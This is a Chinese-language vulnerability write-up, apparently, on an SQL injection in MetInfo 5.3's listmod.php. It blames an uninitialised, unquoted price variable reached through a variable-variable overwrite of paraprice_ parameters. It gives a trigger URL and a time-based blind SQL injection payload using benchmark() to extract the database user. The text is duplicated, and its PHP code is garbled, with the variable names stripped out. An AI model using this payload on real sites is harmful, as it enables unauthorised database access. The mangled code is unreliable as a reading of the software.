看到 MetInfo5.3/include/global/listmod.php 164-184行 ``` foreach( as =){=paraprice_.[id];=$;var_dump();if(){if(!strstr(, -)){preg_match(/([0-9\.]+)/,,); ``` 看到 MetInfo5.3/include/global/listmod.php 164-184行 ``` foreach( as =>){ ="paraprice_".['id']; =$; var_dump(); if(){ if(!strstr(, "-")){ preg_match('/([0-9\.]+)/',,); =[0]; .= " and exists(select * from where module=3 and .paraid='[id]' and .listid=.id and .info > ) "; .= "&".."=".trim($); }else{ //echo 3; =explode('-',); preg_match('/([0-9\.]+)/',[1],); =[0]; .= " and exists(select * from where module=3 and .paraid='[id]' and .listid=.id and .info > [0] and .info < ) "; .= "&".."=".trim($); } } } ``` 其中 $prices_sql[0] 没有初始化,也没有单引号包裹。造成sql注入,但是前面有个逻辑判断。 首先这里有个变量覆盖 $prices=$$prices1; 并且 paraprice_".$val2['id'] 我们可以控制。 只有构造如下url就行了 ``` ?search=search&mdmendy=1¶price_14=tomato-xxxx&mdname=product ``` payload: ``` ?search=search&mdmendy=1¶price_14=1) or if(ascii(mid(user(),1,1))=114,benchmark(10000000, ``` <!--...
看到 MetInfo5.3/include/global/listmod.php 164-184行 ``` foreach( as =){=paraprice_.[id];=$;var_dump();if(){if(!strstr(, -)){preg_match(/([0-9\.]+)/,,); ``` 看到 MetInfo5.3/include/global/listmod.php 164-184行 ``` foreach( as =>){ ="paraprice_".['id']; =$; var_dump(); if(){ if(!strstr(, "-")){ preg_match('/([0-9\.]+)/',,); =[0]; .= " and exists(select * from where module=3 and .paraid='[id]' and .listid=.id and .info > ) "; .= "&".."=".trim($); }else{ //echo 3; =explode('-',); preg_match('/([0-9\.]+)/',[1],); =[0]; .= " and exists(select * from where module=3 and .paraid='[id]' and .listid=.id and .info > [0] and .info < ) "; .= "&".."=".trim($); } } } ``` 其中 $prices_sql[0] 没有初始化,也没有单引号包裹。造成sql注入,但是前面有个逻辑判断。 首先这里有个变量覆盖 $prices=$$prices1; 并且 paraprice_".$val2['id'] 我们可以控制。 只有构造如下url就行了 ``` ?search=search&mdmendy=1¶price_14=tomato-xxxx&mdname=product ``` payload: ``` ?search=search&mdmendy=1¶price_14=1) or if(ascii(mid(user(),1,1))=114,benchmark(10000000, ``` <!--   -->
